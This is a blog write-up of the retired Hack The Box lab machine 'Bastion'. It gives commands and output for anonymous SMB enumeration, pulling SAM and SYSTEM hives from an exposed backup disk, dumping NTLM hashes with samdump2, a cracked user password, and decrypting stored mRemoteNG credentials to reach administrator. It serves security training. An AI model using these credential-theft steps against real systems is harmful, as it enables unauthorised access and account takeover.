Skip to main content

Bastion Writeup - Hack The Box (Retired)

Summary:

Bastion was one of the first few easy boxes that initially introduced me to HackTheBox. Created by L4mpje, a security enthusiast and hobbyist hacker, this box covers realistic Windows environment misconfigurations like unauthenticated file-shares and vulnerable apps with insecure password storage.


Finding a Foothold


Initial Enumeration:

root@kali:~/htb/# nmap -sV -sC -oA nmap/Bastion 10.10.10.134

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-05 13:31 AKDT
Nmap scan report for 10.10.10.134
Host is up (0.50s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h48m16s, deviation: 1h09m14s, median: 2h28m14s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-09-06T02:00:32+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-09-06T00:00:31
|_  start_date: 2019-09-05T22:49:39

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.07 seconds

Nmap indicates that Windows Service Message Block (smb) is an open port and guest authentication is supported. We can scan the host as anonymous for open smb shares using SMBMap.

root@kali:~/htb/Bastion# smbmap -u anonymous -H 10.10.10.134
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: 10.10.10.134                                      
 Disk                                               Permissions
 ----                                               -----------
 ADMIN$                                             NO ACCESS
 Backups                                            READ, WRITE
 C$                                                 NO ACCESS
 IPC$                                               READ ONLY

From the scan, Backups is the only accessible network share on the Windows Server. We can enumerate the contents of the share like so:

root@kali:~/htb/Bastion# smbmap -u anonymous -H 10.10.10.134 -R Backups
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: 10.10.10.134                                      
 Disk                                                   Permissions
 ----                                                   -----------
 Backups                                            READ, WRITE
 [!] Unable to remove test directory at \\10.10.10.134\Backups\huxZgSFPbY, plreae remove manually
 .\
 dr--r--r--                0 Thu Sep  5 16:28:09 2019 .
 dr--r--r--                0 Thu Sep  5 16:28:09 2019 ..
 -w--w--w--              116 Tue Apr 16 03:43:19 2019 note.txt
...
 .\\WindowsImageBackup\
 dr--r--r--                0 Fri Feb 22 03:44:02 2019 .
 dr--r--r--                0 Fri Feb 22 03:44:02 2019 ..
 dr--r--r--                0 Fri Feb 22 03:45:32 2019 L4mpje-PC
 .\\WindowsImageBackup\L4mpje-PC\
 dr--r--r--                0 Fri Feb 22 03:45:32 2019 .
 dr--r--r--                0 Fri Feb 22 03:45:32 2019 ..
 dr--r--r--                0 Fri Feb 22 03:45:32 2019 Backup 2019-02-22 124351
...

There are backups on the drive as well as a .txt file called note.txt. We can download the file and read it like so:

smbmap -u anonymous -H 10.10.10.134 -R Backups -A note.txt
root@kali:~/htb/Bastion# ls
10.10.10.134-Backups_note.txt
root@kali:~/htb/Bastion# cat 10.10.10.134-Backups_note.txt 

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Sensitive Information Gathering:

The note left for the systems administrators indicates that the backups are rather large and shouldn't be transferred under normal means. We can mount the share and explore its contents like so:

Exploring the share, we find two virtual hard disks:

To avoid downloading these VHD's, we could try mounting the disk with guestmount in a linux environment, but because Virtual Hard Disks are specifically Microsoft Disk Images, it's easier to explore the disks when connected to the share in a Windows environment:

Because this is an unencrypted virtual hard disk, we can explore the contents of the disk with ease using 7zip, including sensitive directories like Windows\System32\config\, which has the system's SAM and SYSTEM keys.

After extracting both keys to our host, we can recover all active user NTLM hashes using samdump2 (Note: This technique only works if the anniversary update was not installed prior to making the backup):

root@kali:~/htb/Bastion# samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

We can either crack the last user's password hash with hashcat or reverse-lookup the NTLM hash in an online hash lookup repository (assuming this password in rockyou).

Username: L4mpje
NTLM Hash: 26112010952d963c8dc4217daec986d9
Password: bureaulampje

Acquiring user.txt


Getting Shell Access:

We can verify that our credentials are valid using smbmap as L4mpje; however, we notice that we cannot acquire a shell using PsExec because we still do not have read/write access to the ADMIN$ share:

root@kali:~/htb/Bastion# smbmap -u L4mpje -p bureaulampje -H 10.10.10.134
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: 10.10.10.134                                      
 Disk                                               Permissions
 ----                                               -----------
 ADMIN$                                             NO ACCESS
 Backups                                            READ, WRITE
 C$                                                 NO ACCESS
 IPC$                                               READ ONLY

We can, however, connect over ssh as indicated by our nmap scan earlier:

root@kali:~/htb/Bastion# ssh L4mpje@10.10.10.134
L4mpje@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

l4mpje@BASTION C:\Users\L4mpje>hostname                                                                                         
Bastion                                                                                                                         

l4mpje@BASTION C:\Users\L4mpje>whoami                                                                                           
bastion\l4mpje                                                                                                                  

l4mpje@BASTION C:\Users\L4mpje>whoami /priv                                                                                     

PRIVILEGES INFORMATION                                                                                                          
----------------------                                                                                                          

Privilege Name                Description                    State                                                              
============================= ============================== =======                                                            
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled                                                            
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled                                                            

l4mpje@BASTION C:\Users\L4mpje>type .\Desktop\user.txt                                                                          
9bf***************************cd

Acquiring Administrator Credentials and root.txt


Poorly Encrypted Passwords:

Enumerating some of installed applications, we find one program that particularly stands out:

PS C:\Program Files (x86)> ls                                                                                                   


    Directory: C:\Program Files (x86)                                                                                           


Mode                LastWriteTime         Length Name                                                                           
----                -------------         ------ ----                                                                           
d-----        16-7-2016     15:23                Common Files                                                                   
d-----        23-2-2019     09:38                Internet Explorer                                                              
d-----        16-7-2016     15:23                Microsoft.NET                                                                  
da----        22-2-2019     14:01                mRemoteNG                                                                      
d-----        23-2-2019     10:22                Windows Defender                                                               
d-----        23-2-2019     09:38                Windows Mail                                                                   
d-----        23-2-2019     10:22                Windows Media Player                                                           
d-----        16-7-2016     15:23                Windows Multimedia Platform                                                    
d-----        16-7-2016     15:23                Windows NT                                                                     
d-----        23-2-2019     10:22                Windows Photo Viewer                                                           
d-----        16-7-2016     15:23                Windows Portable Devices                                                       
d-----        16-7-2016     15:23                WindowsPowerShell                                                              

Researching this application yields an insecure password storage vulnerability in older versions of the application. Using mremoteng-decrypt, we can decrypt the credentials of the administrator user:

We can then ssh into the server as the administrator user and recover root.txt:

root@kali:~/htb/Bastion# ssh Administrator@10.10.10.134
Administrator@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

administrator@BASTION C:\Users\Administrator>hostname                                       
Bastion                                                                                     

administrator@BASTION C:\Users\Administrator>whoami                                         
bastion\administrator                                                                       

administrator@BASTION C:\Users\Administrator>type .\Desktop\root.txt                        
958***************************c8                                                                                  

We pwned the built-in Administrator user!
Although the journey to the administrator user wasn't too difficult, what ultimately makes this box a genuinely good box is that it shares many of the qualities (and vulnerabilities/over-zealous permissions) that real-world environments have.

Rayce Toms
Student Researcher

Comments

Popular posts from this blog

Unattended Writeup - Hack The Box (Retired)

Summary: Unattended is a challenging CTF-Like machine created by Hack The Box user @guly . This Linux box is surprisingly more difficult than most medium level boxes and truly tests SQL injection knowledge by forcing users to not entirely rely on automated tools, but to think creatively so they can manually "incept" nested queries to achieve LFI. This ultimately leads to RCE and a shell after log poisoning. With additional enumeration and subtle sysadmin knowledge, we are able to escalate to the root user. Finding a Foothold Initial Enumeration: root@kali : ~/htb/ # nmap -sV -sC -oA nmap/Unattended 10.10.10.126 Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-22 19:45 AKDT Nmap scan report for www.nestedflanders.htb (10.10.10.126) Host is up (0.20s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http nginx 1.10.3 |_http-server-header: nginx/1.10.3 |_http-title: Did not follow redirect to https://www.nestedflanders.ht...

OneTwoSeven Writeup - Hack The Box (Retired)

Summary: OneTwoSeven is a creatively designed realistic box by Hack The Box user @jkr . The foothold for this Linux box craftily utilizes symbolic links and port forwarding through sftp to gain access to the admin interface. This ultimately leads to RCE and a shell after some addon-based web exploitation. For escalating to the root user, we take advantage of the available apt sudo commands while performing a man-in-the-middle package injection via http-proxy. I have seen a similar, if not the same attack (slide 26), executed as part of Red Team's arsenal at the National Collegiate Cyber Defense Competition . Finding a Foothold Initial Enumeration: root@kali : ~/htb/ # nmap -sV -sC -oA nmap/OneTwoSeven 10.10.10.133 Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-08 22:04 AKDT Nmap scan report for 10.10.10.133 Host is up (0.12s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh...